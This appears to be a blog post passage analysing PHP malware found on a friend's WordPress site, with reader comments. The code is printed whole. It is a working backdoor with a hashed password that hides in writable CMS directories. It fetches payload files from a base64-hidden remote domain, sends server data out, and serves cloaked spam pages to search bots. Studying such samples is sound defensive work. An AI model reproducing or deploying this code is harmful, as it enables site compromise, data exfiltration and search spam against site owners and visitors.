    if ($nexturl!=""){
        header("Location: $nexturl");
    }
    return array($buf,$ct);

}

function get_db_path(){

    if (stristr(PHP_OS,"win")){
        return sys_get_temp_dir();
    }

    $default_dirs = array(
        'wp-includes/SimplePie/Content',
        'wp-includes/js/tinymce/plugins',
        'wp-content/plugins/akismet/_inc/img',
        'administrator/components/com_media/views/images',
        'libraries/cms/html/language',
        'media/editors/tinymce/js/plugins',
        'tmp',
        'wp-content/uploads'
    );

    foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);

    $current_dir = opendir('.');
    while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
    closedir($current_dir);

    if (is_writable('.')) return ('.');

    $tmp_dir = sys_get_temp_dir();
    if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;

    return ".";

}




$content="";
$x=get_val("pppp_check");

$md5pass="e5e4570182820af0a183ce1520afe43b";

$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);


$xmd5="/.".$md5host."/";

$cfile="emoji1.png";

if (!@file_exists(".".$xmd5.$cfile)){
    $tmppath=get_db_path();
}else{
    $tmppath=".";
}

$tmppath=$tmppath.$xmd5;@mkdir($tmppath);


$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";

@ini_set('memory_limit','1600M');


$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");

$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));

if (($x!="")&&($p==$md5pass)){

    if ($x=="2"){
        echo "###UPDATING_FILES###\n";
        $ur="http://".$domain."/images/".$md5host."/";
        list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
        list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
        list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
        echo "###UPDATED###\n";
        exit;
    }


    if ($x=="4"){
        echo "###WORKED###\n";exit;
    }
    if ($x=="5"){
        $cf=array();
        if (@file_exists($configs)){
            $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
        }

        $out=array(
                        'cf' => $cf,
                        'server' => $_SERVER,
                        'file' => __FILE__,
                        'configfile' => $configs,
                        'db_file_size' => is_file($bd) ? filesize($bd) : 0,
                        'template_file_size' => is_file($templ) ? filesize($templ) : 0,
                    );
        echo base64_encode(serialize($out));

        exit;

    }


}else{

    $cf=array();
    if (@file_exists($configs)){
        $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
    }

    if (@isset($cf[$md5urx])){
        $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
        $off=$cf[$md5urx]+0;
        $template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
        $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
        if ($bot) {
            if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

            if (isset($info["isdoor"])){

                if (isset($info["standalone"])){
                    $doorcontent=base64_decode($text);
                    echo $doorcontent;exit;
                }else{
                    if ((isset($info["nr"]))&&(is_array($info["nr"]))){
                        foreach($info["nr"] as $mark => $repl){
                            $template=str_replace($mark,$repl,$template);
                        }
                    }else{
                        $template=str_replace("%text%",$text,$template);
                        $template=str_replace("%title%",$title,$template);
                        $template=str_replace("%description%",$description,$template);
                        $template=str_replace("%uckeyword%",$uckeyword,$template);
                        $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

                        foreach($inside_links as $i => $link){
                            $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
                        }
                    }

                    echo $template;exit;
                }
            }else{

                list($buf,$ct)=get_proxy_page();

                if (stristr($ct,"text/html")){
                    $rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
                    $links=$info["links_a"];
                    $buf=change_page_regex($buf,$links,$rega,$resa);

                    $regp='/(.{30}\<\/p\>)/is';$resp=1;
                    $links=$info["links_p"];
                    $buf=change_page_regex($buf,$links,$regp,$resp);
                }

                echo $buf;exit;
            }



        }
        if ($se) {
            if (isset($info["isdoor"])){
                list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
            }else{
                list($buf,$ct)=get_proxy_page();
            }
            echo $buf;exit;
        }
    }else{

        list($buf,$ct)=get_proxy_page();
        echo $buf;exit;
    }

}
Enter fullscreen mode Exit fullscreen mode

Immediately, I notice $domain which is a base64 encoded string, which when decoded gives:

indikateit.ru

I'm guessing this is the server which the allegedly malcious scripts post information to.

This decoded base64 script references $_COOKIE, $_SERVER & $_REQUEST, the same variables which the first file referenced.

Update: Upon googling some of the base64 decoded code, I found a link on UnPHP of someone who deobfuscated similar code

However, the domain in this one was hlemovka.ru

Top comments (3)

Collapse
 
phantas0s profile image
Matthieu Cneude

Nice job!

I've a question: how does this code ended up on the server of your friend?

For now, my conclusion is: don't use Wordpress. I've so many requests on my server trying to connect to the Wordpress admin (even if my website is not a wordpress), it's insane.

Collapse
 
rat profile image
🐁

Thanks for the comment.

My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.

Collapse
 
daireisu profile image
Daireisu Khyeras

Just noticed this issue on our own site. Might want to check the web.config file too.

boyet.com/blog/godaddy-shared-wind...

Read next

prahladyeri profile image

PHP Libraries for PDF Handling: Evaluation and Use Case Guide

Prahlad Yeri -

nasrulhazim profile image

Writing Flexible Enums in PHP with Interfaces and Traits

Nasrul Hazim Bin Mohamad -

xxzeroxx profile image

Apache Virtual Host: Load Balancer

Antonio Silva -

arkdevsolutions profile image

How to Setup Multi Tenant App in minutes with Laravel PART 2

ARK DEV SOLUTIONS -